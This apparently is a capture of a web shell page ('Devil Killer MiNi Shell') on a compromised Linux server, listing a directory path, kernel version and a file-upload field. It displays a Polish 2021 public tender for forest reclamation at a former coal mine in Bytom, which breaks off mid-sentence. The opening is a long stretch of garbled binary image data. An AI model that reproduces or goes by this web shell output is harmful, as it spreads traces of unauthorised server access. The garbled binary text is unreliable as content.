JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210816/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210816/0014955801-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> „Rekultywacja w kierunku leśnym w oddziale leśnym 404 g, c” dla SRK S.A. Oddział Kopalnie Węgla Kamiennego w Całkowitej Likwidacji” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Spółka Restrukturyzacji Kopalń S.A.</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 276902504</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Strzelców Bytomskich 207</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Bytom</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">41-914</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL228 - Bytomski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">eligacz@srk.com.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.srk.com.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inna państwowa jednostka organizacyjna nieposiadająca osobowości prawnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> GÓRNICTWO </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Rekultywacja w kierunku leśnym w oddziale leśnym 404 g, c” dla SRK S.A. Oddział Kopalnie Węgla Kamiennego w Całkowitej Likwidacji” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-4bb60306-fe6a-11eb-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00149558</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-08-16</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> www.srk.com.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://efo.coig.biz</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Dopuszczalne przeglądarki internetowe:przeglądarka internetowa z włączoną<br/>obsługąJavaScript:Internet Explorer wersja 10 lub 11, Mozilla Firefox od wersji 50 (bez wsparcia dla<br/>wersjibeta),zainstalowane darmowe oprogramowanie JAVA (JRE) – zgodnie z zaleceniami ze<br/>stronydostawcyJava, minimalna rozdzielczość ekranu wymagana do poprawnego<br/>wyświetlania1366x786Pozostałewymagania techniczne:1) dostęp do sieci Internet,komputer klasy PC<br/>komputerklasy PC z jednym znastępujących systemów operacyjnych: Windows 7, Windows 8,<br/>Windows 10 (bezwsparcia dlaWindows XP, Vista)</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zamawiający zgodnie z art. 13 ust. 1 i 2 rozporządzenia<br/>Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób<br/>fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich<br/>danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L<br/>119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że: 􀀀 administratorem Pani/Pana danych<br/>osobowych jest Spółka Restrukturyzacji Kopalń Spółka Akcyjna z siedzibą w Bytomiu (41-914) przy ul.<br/>Strzelców Bytomskich 207 nr tel. (32) 432 1005;􀀀 inspektorem ochrony danych osobowych w Spółce<br/>Restrukturyzacji Kopalń jest Pan Andrzej Maj tel. 432 1133 email iod@srk.com.pl􀀀 Pani/Pana dane<br/>osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z<br/>przedmiotowym postępowaniem o udzielenie zamówienia publicznego prowadzonym w trybie<br/>podstawowym;􀀀 odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym<br/>udostępniona zostanie dokumentacja postępowania w oparciu o art. 8 oraz art. 96 ust. 3 ustawy z dnia<br/><br/>11 września 2019 r. – Prawo zamówień publicznych (Dz. U. z 2019 r. poz. 2019 z późn. zm.), dalej<br/>„ustawa Pzp”; 􀀀 Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 97 ust. 1 ustawy Pzp,<br/>przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania<br/>umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;􀀀 obowiązek<br/>podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem<br/>ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o<br/>udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy<br/>Pzp; 􀀀 w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób<br/>zautomatyzowany, stosowanie do art. 22 RODO;􀀀 posiada Pani/Pan:− na podstawie art. 15 RODO<br/>prawo dostępu do danych osobowych Pani/Pana dotyczących;− na podstawie art. 16 RODO prawo do<br/>sprostowania Pani/Pana danych osobowych;− na podstawie art. 18 RODO prawo żądania od<br/>administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których<br/>mowa w art. 18 ust. 2 RODO; − prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych<br/>Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza<br/>przepisy RODO;􀀀 nie przysługuje Pani/Panu:− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do<br/>usunięcia danych osobowych;− prawo do przenoszenia danych osobowych, o którym mowa w art. 20<br/>RODO;− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż<br/>podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP-KCL-0001/21-1</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zakres rzeczowy zamówienia obejmuje:1) Kompleksową naprawę szkód wyrządzonych<br/>ruchem zakładu górniczego na terenie Leśnictwa Podlesice w oddziale leśnym 404 g, c (dawny<br/>oddział 163g), poprzez wykonanie rekultywacji, zgodnie z:− dokumentacją projektowo –<br/>kosztorysową naprawy szkody spowodowanej ruchem zakładu górniczego KWK „Boże Dary” w<br/>oddziale lesnym 163g Leśnictwa Podlesie - obręb Murcki, Nadleśnictwa Katowice dla SRK S.A.<br/>Oddział KWK „Boże Dary” wykonanej przez PHU „GEO – EKO – WIERT”,- przedmiarem robót,-<br/>opisem przedmiotu zamówienia.2) Przedmiot zamówienia obejmuje m.in.:a. Wykonanie zadania<br/>w następujących etapach: - Prace przygotowawcze – które obejmować będą m.in. wycinkę<br/>drzew i krzewów, - Rekultywacja techniczna – która obejmować będzie odmulenie rowów<br/>melioracyjnych oraz przygotowanie gleby pod nasadzenia,- Rekultywacja biologiczna – która<br/>obejmować będzie nasadzenie drzew, - Zabiegi pielęgnacyjne – prowadzone w okresie 5-<br/>letnim,- Roboty inwentaryzacyjne i geodezyjne powykonawcze.3) opracowanie harmonogramu<br/>rzeczowo-finansowego robót rekultywacyjnych (zwanego dalej Harmonogramem) w kwocie<br/>brutto z rozbiciem na kwartały z określeniem poszczególnych zakresów i etapów robót<br/>wyszczególnionych w przedmiarze robót,4) dokonanie oznakowania przedsięwzięcia przed i po<br/>wykonaniu zadania zgodnie z „Instrukcją oznakowania przedsięwzięć dofinansowanych ze<br/>środków Narodowego Funduszu Ochrony Środowiska i Gospodarki Wodnej“,5) uporządkowanie<br/>terenu,6) wykonanie dokumentacji powykonawczej w skład której wchodzić będzie mapa z pomiarem powykonawczym zawierająca aktualny pomiar sytuacyjny i wysokościowy rowów na<br/>profilach z dokumentacji projektowej, z potwierdzonym przyjęciem do Państwowego Zasobu<br/>Geodezyjnego i Kartograficznego,7) sprzątnięcie i uporządkowanie miejsca wykonania robót,8)<br/>wywóz materiałów odpadowych pochodzących z placu budowy i ich utylizacja. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45112330-7 - Rekultywacja terenu</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2026-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty zamawiający będzie się<br/>kierował następującym kryterium: 21.1.1. Opis kryterium ,,Cena” (cena oferowana brutto). Waga<br/>kryterium 100%Kryterium ,,Cena” będzie rozpatrywane na podstawie ceny brutto wpisanej w pkt 3.1<br/>Formularza Ofertowego, według następującego wzoru: C = Cmin/Cb x 100 pkt gdzie: C – liczba pkt w<br/>kryterium Cena Cmin – Cena oferty najtańszej Cb – cena (cena ofertowa brutto) oferty badanejZa<br/>najkorzystniejszą zostanie uznana oferta, która nie podlega odrzuceniu oraz uzyskała największą ilość<br/>punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia może się ubiegać wykonawca spełniający następujące<br/>warunki:8.1.1. Zamawiający uzna warunek w zakresie zdolności do występowania w obrocie<br/>gospodarczym za spełniony, jeżeli wykonawca wykaże się:1. wpisem do jednego z rejestrów<br/>zawodowych lub handlowych prowadzonych w kraju, w którym mają siedzibę lub miejsce<br/>zamieszkania8.1.2. Zamawiający uzna warunek w zakresie sytuacji ekonomicznej lub<br/>finansowej jeżeli wykonawca wykaże się, że:1. posiada ubezpieczenie od odpowiedzialności<br/>cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę<br/>gwarancyjną o wartości co najmniej 250 000,00 zł (słownie: dwieście pięćdziesiąt tysięcy złotych<br/>00/100 ),8.1.3. Zamawiający uzna warunek w zakresie zdolności technicznej i zawodowej jeżeli<br/>wykonawca wykaże się:1. należytym wykonaniem robót budowlanych w okresie ostatnich 5 lat<br/>przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w<br/>tym okresie, w tym co najmniej jedną robotą w ramach jednej umowy polegającą na wykonaniu<br/>rekultywacji technicznej i biologicznej w kierunku leśnym na powierzchni minimum 1,5 ha o<br/>wartości minimum 300 000,00 zł brutto wraz z dowodami określającymi czy te roboty budowlane<br/>zostały wykonane należycie.2. dysponowaniem następującymi osobami, które zostaną<br/>skierowane do realizacji zamówienia publicznego, w szczególności odpowiedzialnymi za<br/>świadczenie usług, kontrole jakości lub kierowanie robotami budowlanymi posiadającymi<br/>uprawnienia : minimum 1 osoba z uprawnieniami geodezyjnymi w zakresie pomiarów<br/>sytuacyjno- wysokościowych, realizacyjnych, inwentaryzacyjnych, wydanymi zgodnie z<br/>przepisami ustawy z dnia 17 maja 1989r. Prawo geodezyjne i kartograficzne,  minimum 1 osoba<br/>posiadającą uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w<br/>specjalności konstrukcyjno-budowlanej wydane zgodnie z przepisami ustawy z dnia 7 lipca<br/>1994r. Prawo budowlane, zgodnie z Rozporządzeniem Ministra Inwestycji i Rozwoju z dnia 29<br/>kwietnia 2019r. w sprawie przygotowania zawodowego do wykonywania samodzielnych funkcji<br/>technicznych w budownictwie lub uprawnienia budowlane równoważne wydane na podstawie<br/>wcześniejszych przepisów prawa, i która legitymuje się aktualną przynależnością do właściwej<br/>izby samorządu zawodowego, minimum 1 osoba posiadającą wykształcenie leśne i co najmniej<br/>5 – letni staż nad nadzorem przy nasadzeniach, zabiegach pielęgnacyjnych i ochronnych. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">9.2. Podmiotowe środki dowodowe, jakie zobowiązany będzie złożyć<br/>wykonawca, którego oferta zostanie najwyżej oceniona, lub wykonawcy, których Zamawiający wezwie do złożenia wszystkich lub niektórych podmiotowych środków dowodowych w przypadkach, o których<br/>mowa w art. 126 ust. 2 ustawy Pzp:9.2.1. Dokument potwierdzający, że wykonawca jest wpisany do<br/>jednego rejestrów zawodowych lub handlowych, prowadzonych w kraju, w którym ma siedzibę lub<br/>miejsce zamieszkania, wystawiony nie wcześniej niż 6 miesięcy przed jego złożeniem;9.2.2. Dokument<br/>potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie<br/>prowadzonej działalności związanej z przedmiotem zamówienia ze wskazaniem sumy gwarancyjnej<br/>tego ubezpieczenia;9.2.3. wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich<br/>5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju,<br/>wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz<br/>załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym<br/>dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz<br/>którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie<br/>jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty; załącznikiem 3 do SWZ.9.2.4.<br/>wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności<br/>odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych,<br/>uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a<br/>także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi<br/>osobami, zgodnie z załącznikiem nr 4 do SWZ.9.2.5. oświadczenie Wykonawcy dotyczące ilości<br/>zatrudnionych pracowników przewidzianych do realizacji zamówienia objętych zamówieniem z<br/>minimalnym wynagrodzeniem albo na minimalnej stawce godzinowej oraz wysokości odprowadzanych<br/>składek z tytułu ubezpieczenia społecznego lub zdrowotnego –zgodnie z załącznikiem nr 10 do<br/>SWZ.9.2.6. oświadczenie wykonawcy w celu potwierdzenia braku podstaw wykluczenia w zakresie art.<br/>108 ust. 1 pkt 5 ustawy Pzp zgodnie z załącznikiem nr 5 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">9.1. Wykonawca składa wraz z ofertą:1) oświadczenie o braku podstaw do wykluczenia i spełnieniu<br/>warunków udziału w postępowaniu podpisując formularz oferty, w którego treści zawarto wymagane<br/>oświadczenie. (dotyczy podstaw wykluczenia z art. 108 i 109 ust. 1 pkt. 5, 7, 8 i 10 stanowiące<br/>załącznik nr 1 do „Formularza Ofertowego”2) oświadczenie podmiotu udostępniającego o braku<br/>podstaw do wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w<br/>postępowaniu w zakresie w jakim wykonawca powołuje się na jego zasoby, jeżeli wykonawca polega<br/>na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej innych<br/>podmiotów w odniesieniu do tych podmiotów stanowiące załącznik nr 2 do „Formularza Ofertowego”3)<br/>zobowiązanie podmiotu udostępniającego zasoby do oddania Wykonawcy do dyspozycji niezbędnych<br/>zasobów na potrzeby realizacji danego zamówienia lub inny środek dowodowy potwierdzający, że<br/>wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów<br/>stanowiące załącznik nr 3 do „Formularza Ofertowego”. Zobowiązanie do oddania do dyspozycji<br/>zasobów – jeżeli Wykonawca w celu potwierdzenia spełniania warunków udziału w postępowaniu o<br/>których mowa w pkt 8.1.2 i 8.1.3 polega na zdolnościach innych podmiotów, z którego będzie<br/>wynikać:1) zakres dostępnych wykonawcy zasobów podmiotu udostępniającego zasoby;2) sposób i<br/>okres udostępnienia wykonawcy i wykorzystania przez niego zasobów podmiotu udostępniającego te<br/>zasoby przy wykonywaniu zamówienia;3) czy i w jakim zakresie podmiot udostępniający zasoby, na<br/>zdolnościach którego wykonawca polega w odniesieniu do warunków udziału w postępowaniu<br/>dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, zrealizuje roboty budowlane<br/>lub usługi, których wskazane zdolności dotyczą.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 5.1. Zamawiający żąda złożenia wraz z ofertą następujących przedmiotowych środków<br/>dowodowych:5.1.1. Oświadczenie o odpadach wg wzoru z załącznika nr 5 do FORMULARZA<br/>OFERTOWEGO zamówienia5.2. Jeżeli Wykonawca nie złoży<br/>przedmiotowych środków dowodowych lubzłożone przedmiotowe środki dowodowe będą<br/>niekompletne, Zamawiający wezwie do ich złożenia lub uzupełnienia w wyznaczonym<br/>terminie.5.3. Postanowień pkt 5.2. nie stosuje się, jeżeli przedmiotowy środek dowodowy służy<br/>wyłącznie potwierdzaniu zgodności z cechami lub kryteriami określonymi w opisie kryteriów<br/>oceny ofert lub, pomimo złożenia przedmiotowego środka dowodowego, oferta podlega<br/>odrzuceniu albo zachodzą przesłanki unieważnienia postępowania. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Jeżeli Wykonawca nie złoży przedmiotowych środków dowodowych lub złożone<br/>przedmiotoweśrodki dowodowe będą niekompletne, Zamawiający wezwie do ich złożenia lub<br/>uzupełnienia wwyznaczonym terminie. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.3.1.) Adres internetowy aukcji: <span class="normal">https://laip-srk.coig.biz/</span></h3> <h3 class="mb-0">6.3.2.) Opis aukcji elektronicznej: </h3> Zgodnie z art. 281 ust. 17 ustawy Prawo zamówieńpublicznychZamawiający informuje, że w<br/>niniejszym postępowaniu przewiduje aukcję elektroniczną.22.1.1.po dokonaniu badania<br/>złożonych ofert w celu wyboru najkorzystniejszej oferty przeprowadzonazostanie aukcja<br/>elektroniczna, jeżeli w postępowaniu złożone zostaną co najmniej dwie 